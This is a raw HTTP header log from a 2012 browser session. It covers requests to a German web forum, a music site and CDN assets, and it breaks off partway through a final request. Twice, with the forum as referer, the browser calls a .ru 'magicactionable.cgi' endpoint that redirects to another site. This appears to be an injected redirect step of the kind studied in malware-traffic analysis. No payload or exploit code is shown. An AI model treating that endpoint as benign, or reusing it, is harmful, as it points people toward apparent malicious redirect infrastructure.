GET /icon/wasOnlineSortM.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Sun, 24 Feb 2008 11:19:31 GMT
Etag: &quot;2fc0974-3f2-446e5a117f6c0&quot;
Accept-Ranges: bytes
Content-Length: 1010
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /wcf/icon/searchHeadOptionsS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/wcf/style/style-6.css
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 12 May 2009 13:30:29 GMT
Etag: &quot;2fc2bc3-22c-469b7192aa740&quot;
Accept-Ranges: bytes
Content-Length: 556
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
GET /icon/boardMarkAsReadS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Wed, 28 Jul 2010 16:10:07 GMT
Etag: &quot;2fc08b1-276-48c74d9eb15c0&quot;
Accept-Ranges: bytes
Content-Length: 630
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
GET /wcf/icon/favicon/faviconGrey.ico HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/x-icon
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 25 Sep 2007 14:20:18 GMT
Etag: &quot;2fc2c97-9f6-43af66fbf0c80&quot;
Accept-Ranges: bytes
Content-Length: 2550
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /wcf/images/logo.gif HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/wcf/style/style-6.css
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Tue, 17 Aug 2010 16:54:02 GMT
Etag: &quot;2fc2d54-1ebec-48e07cbcd7e80&quot;
Accept-Ranges: bytes
Content-Length: 125932
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wcf/icon/termsOfUseS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Thu, 29 Jul 2010 16:01:44 GMT
Etag: &quot;2fc2c3b-2e2-48c88d9c74a00&quot;
Accept-Ranges: bytes
Content-Length: 738
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
GET /wcf/icon/styleOptionsS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 18 May 2009 12:40:29 GMT
Etag: &quot;2fc2c1b-388-46a2f19668940&quot;
Accept-Ranges: bytes
Content-Length: 904
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
GET /wcf/icon/legalNoticeS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Thu, 29 Jul 2010 15:31:47 GMT
Etag: &quot;2fc2aee-1ac-48c886eab3ec0&quot;
Accept-Ranges: bytes
Content-Length: 428
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /wcf/icon/dateS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:39 GMT
Etag: &quot;2fc2a14-288-48df319f68bc0&quot;
Accept-Ranges: bytes
Content-Length: 648
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wcf/icon/submitS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:39 GMT
Etag: &quot;2fc2c1f-275-48df319f68bc0&quot;
Accept-Ranges: bytes
Content-Length: 629
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /wcf/icon/helpS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:39 GMT
Etag: &quot;2fc2ab4-2df-48df319f68bc0&quot;
Accept-Ranges: bytes
Content-Length: 735
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /magicactionable.cgi?8 HTTP/1.1

Host: nullifiedfilebyfile.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Mon, 05 Nov 2012 19:04:17 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Tue, 06-Nov-2012 19:04:17 GMT; path=/; domain=nullifiedfilebyfile.ru
Location: http://www.ladygaga.com
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 156
GET / HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 133
Location: /bornthiswayball/
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:01 GMT
Connection: keep-alive
GET /wcf/icon/loginOptionsS.png HTTP/1.1

Host: www.frozen-backside.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: wcf_cookieHash=a683659e42d2c003effc56431a4acba1824daccf; wcf_boardLastActivityTime=1352142119
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 19:02:01 GMT
Server: Apache/2.2.22
Last-Modified: Mon, 16 Aug 2010 16:12:39 GMT
Etag: &quot;2fc2b16-2fe-48df319f68bc0&quot;
Accept-Ranges: bytes
Content-Length: 766
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
GET / HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 133
Location: /bornthiswayball/
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:01 GMT
Connection: keep-alive
GET /web_assets/_global/css/blueprint/screen.css HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Thu, 24 Mar 2011 23:54:30 GMT
Accept-Ranges: bytes
Etag: &quot;c42130d17eeacb1:0&quot;
Server: Microsoft-IIS/7.0
Content-Encoding: gzip
Content-Length: 3507
Vary: Accept-Encoding
Cache-Control: private, max-age=49741
Date: Mon, 05 Nov 2012 19:02:01 GMT
Connection: keep-alive
GET /web_assets/_global/css/blueprint/print.css HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Thu, 30 Sep 2010 10:54:02 GMT
Accept-Ranges: bytes
Etag: &quot;01d8ca8d60cb1:0&quot;
Server: Microsoft-IIS/7.0
Content-Encoding: gzip
Content-Length: 670
Vary: Accept-Encoding
Cache-Control: private, max-age=77657
Date: Mon, 05 Nov 2012 19:02:01 GMT
Connection: keep-alive
GET /bornthiswayball/ HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 11344
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:01 GMT
Connection: keep-alive
Set-Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM; path=/
GET /backplane.js HTTP/1.1

Host: d134l0cdryxgwa.cloudfront.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.0 200 OK

Content-Type: text/javascript
Content-Length: 15289
Connection: keep-alive
Accept-Ranges: bytes
Date: Fri, 02 Nov 2012 22:28:52 GMT
EC2-instance-id: i-4f41e134
Etag: W/&quot;15289-1351865778000&quot;
Last-Modified: Fri, 02 Nov 2012 14:16:18 GMT
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Age: 81189
X-Amz-Cf-Id: dCI8PECh-XBnBM3toCR2BUm48Gqb9GN327tCDw6z0azp3LDtbuNROw==
Via: 1.0 cacff3534bf6dc97c5efb0e2f25f6c15.cloudfront.net (CloudFront)
X-Cache: Hit from cloudfront
GET /magicactionable.cgi?8 HTTP/1.1

Host: nullifiedfilebyfile.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Mon, 05 Nov 2012 19:04:18 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Tue, 06-Nov-2012 19:04:17 GMT; path=/; domain=nullifiedfilebyfile.ru
Location: http://www.ladygaga.com
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 156
GET /web_assets/_global/css/ALL.css HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Fri, 02 Nov 2012 17:51:54 GMT
Accept-Ranges: bytes
Etag: &quot;6abdb6be22b9cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 8043
Vary: Accept-Encoding
Cache-Control: private, max-age=72398
Date: Mon, 05 Nov 2012 19:02:01 GMT
Connection: keep-alive
GET /web_assets/_global/js/library/SWFobject/swfobject.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Sat, 22 Apr 2006 08:27:30 GMT
Accept-Ranges: bytes
Etag: &quot;0c56098e665c61:0&quot;
Server: Microsoft-IIS/7.0
Content-Encoding: gzip
Content-Length: 2115
Vary: Accept-Encoding
Cache-Control: private, max-age=51804
Date: Mon, 05 Nov 2012 19:02:01 GMT
Connection: keep-alive
GET /web_assets/_global/js/IGA.linktagger.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 03 Aug 2011 04:33:02 GMT
Accept-Ranges: bytes
Etag: &quot;6928406e9651cc1:0&quot;
Server: Microsoft-IIS/7.0
Content-Encoding: gzip
Content-Length: 824
Vary: Accept-Encoding
Cache-Control: private, max-age=16215
Date: Mon, 05 Nov 2012 19:02:01 GMT
Connection: keep-alive
GET /web_assets/_global/js/ALL_min.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 22 Mar 2011 23:30:43 GMT
Accept-Ranges: bytes
Etag: &quot;f952be29e9e8cb1:0&quot;
Server: Microsoft-IIS/7.0
Content-Encoding: gzip
Content-Length: 7629
Vary: Accept-Encoding
Cache-Control: private, max-age=9525
Date: Mon, 05 Nov 2012 19:02:01 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/iga-echo-script.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 27 Jan 2012 01:26:18 GMT
Accept-Ranges: bytes
Etag: &quot;c09b7dab92dccc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 1268
Vary: Accept-Encoding
Cache-Control: private, max-age=9420
Date: Mon, 05 Nov 2012 19:02:01 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/blank-links.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 09 Aug 2011 23:00:35 GMT
Accept-Ranges: bytes
Etag: &quot;50b0c225e856cc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 572
Vary: Accept-Encoding
Cache-Control: private, max-age=48277
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/plugins/clear-after-body.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Fri, 06 May 2011 00:00:01 GMT
Accept-Ranges: bytes
Etag: &quot;f615e78b80bcc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 284
Vary: Accept-Encoding
Cache-Control: private, max-age=11290
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET / HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 133
Location: /bornthiswayball/
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /mxd3gmg.js HTTP/1.1

Host: use.typekit.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=utf-8
Content-Encoding: gzip
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Date: Mon, 05 Nov 2012 19:02:02 GMT
Last-Modified: Mon, 05 Nov 2012 18:53:33 GMT
Server: ECS (arn/46F9)
Status: 200 OK
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 9333
GET /web_assets/_global/js/echo/river.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 08 May 2012 18:25:25 GMT
Accept-Ranges: bytes
Etag: &quot;ecd710f0472dcd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 4156
Vary: Accept-Encoding
Cache-Control: private, max-age=48276
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/forum.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Sat, 07 May 2011 00:25:01 GMT
Accept-Ranges: bytes
Etag: &quot;ea93b344dccc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 748
Vary: Accept-Encoding
Cache-Control: private, max-age=18268
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /web_assets/_global/js/echo/muxer.js HTTP/1.1

Host: cache.umusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 25 May 2011 01:43:26 GMT
Accept-Ranges: bytes
Etag: &quot;6cb7f247d1acc1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 944
Vary: Accept-Encoding
Cache-Control: private, max-age=15786
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /assets/capture_client.js HTTP/1.1

Host: d7v0k4dt27zlp.cloudfront.net

